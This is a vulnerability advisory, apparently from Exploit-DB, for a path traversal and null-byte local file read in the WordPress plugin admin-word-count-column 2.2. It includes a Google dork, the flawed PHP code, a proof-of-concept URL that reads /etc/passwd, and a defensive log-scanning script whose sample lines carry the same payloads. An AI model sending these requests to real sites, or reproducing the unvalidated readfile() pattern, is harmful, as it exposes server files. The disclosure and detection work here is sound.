Vendor: admin-word-count-column
By: Hassan Khan Yusufzai - Splint3r7
CVSS: 8.8 (HIGH)
Vulnerability Type: Local File Read
CWE: 22
Product Name: admin-word-count-column
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: YES
Platforms Tested: PHP 5.3.2 or below
Year: 2022

WordPress Plugin admin-word-count-column 2.2 – Local File Read

WordPress Plugin admin-word-count-column version 2.2 contains a Local File Read vulnerability. The 'download-csv.php' script passes the user-supplied 'path' parameter to readfile() without validating it, so a remote attacker can send a specially crafted request to the script and read arbitrary files from the server. The attacker can also inject a null byte to bypass the file extension restriction (the 'cpwc.csv' suffix the script appends to the path) and read any file from the server.

Mitigation:

Update to the latest version of the WordPress Plugin admin-word-count-column.

Exploit-DB raw data:

# Exploit Title: WordPress Plugin admin-word-count-column 2.2 - Local File Read
# Google Dork: inurl:/wp-content/plugins/admin-word-count-column/
# Date: 27-03-2022
# Exploit Author: Hassan Khan Yusufzai - Splint3r7
# Vendor Homepage: https://wordpress.org/plugins/admin-word-count-column/
# Version: 2.2
# Contact me: h [at] spidersilk.com

# PHP version: 5.3.2 or below

# Vulnerable File: plugins/admin-word-count-column/download-csv.php

# Vulnerable Code:

```
<?php
date_default_timezone_set('America/Los_Angeles');
$csvdate = date('Md-H-i-s-T');
$csvname = 'wordcounts-' . $csvdate . '.csv';
header('Content-Type: application/csv');
header('Content-Disposition: attachment; filename=' . $csvname);
header('Pragma: no-cache');
readfile($_GET['path'] . 'cpwc.csv');
?>
```

# Proof of Concept:

localhost/wp-content/plugins/admin-word-count-column/download-csv.php?path=../../../../../../../../../../../../etc/passwd\0

Note: Null byte injection will only work in PHP 5.3.2 and below.
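
Added example (not part of the original advisory or the plugin's code): a Python check that scans web server access logs for requests to download-csv.php whose 'path' parameter carries directory traversal or a null byte, including double-encoded forms. The combined log format, the sample lines, and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

BASE = "/wp-content/plugins/admin-word-count-column/download-csv.php"
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3})')

def fully_decode(value, rounds=3):
    """Percent-decode repeatedly so double-encoded input (%252e) is normalised."""
    for _ in range(rounds):
        value = unquote(value)
    return value

def classify_path_param(raw):
    """Return why a 'path' value looks like abuse of the readfile() call."""
    value = fully_decode(raw)
    reasons = []
    if "\x00" in value or "\\0" in value:  # real NUL, or the literal \0 form shown in the PoC
        reasons.append("null-byte")
    if ".." in re.split(r"[\\/]+", value):  # any path segment that is exactly ".."
        reasons.append("traversal")
    return reasons

def scan(lines):
    """Return (client_ip, status, reasons) for suspicious requests to the script."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        if not unquote(url.path).endswith(BASE):
            continue
        # parse_qs decodes once; classify_path_param decodes any remaining layers.
        for raw in parse_qs(url.query, keep_blank_values=True).get("path", []):
            reasons = classify_path_param(raw)
            if reasons:
                hits.append((m["ip"], int(m["status"]), reasons))
    return hits

# Constructed access-log lines (combined log format), not taken from a real server.
SAMPLE_LOG = [
    f'203.0.113.7 - - [27/Mar/2022:10:00:01 +0000] "GET {BASE}?path=../../../etc/passwd%00 HTTP/1.1" 200 1532',
    f'203.0.113.8 - - [27/Mar/2022:10:00:05 +0000] "GET {BASE}?path=%252e%252e%252f%252e%252e%252fetc%252fpasswd%2500 HTTP/1.1" 404 196',
    f'198.51.100.4 - - [27/Mar/2022:10:01:00 +0000] "GET {BASE}?path=exports/ HTTP/1.1" 200 88',
    '198.51.100.9 - - [27/Mar/2022:10:02:00 +0000] "GET /index.php?path=../x HTTP/1.1" 200 10',
]
if __name__ == "__main__":
    print(*scan(SAMPLE_LOG), sep="\n")
```

A hit with status 200 and a response size that does not match a normal CSV export is the case to triage first.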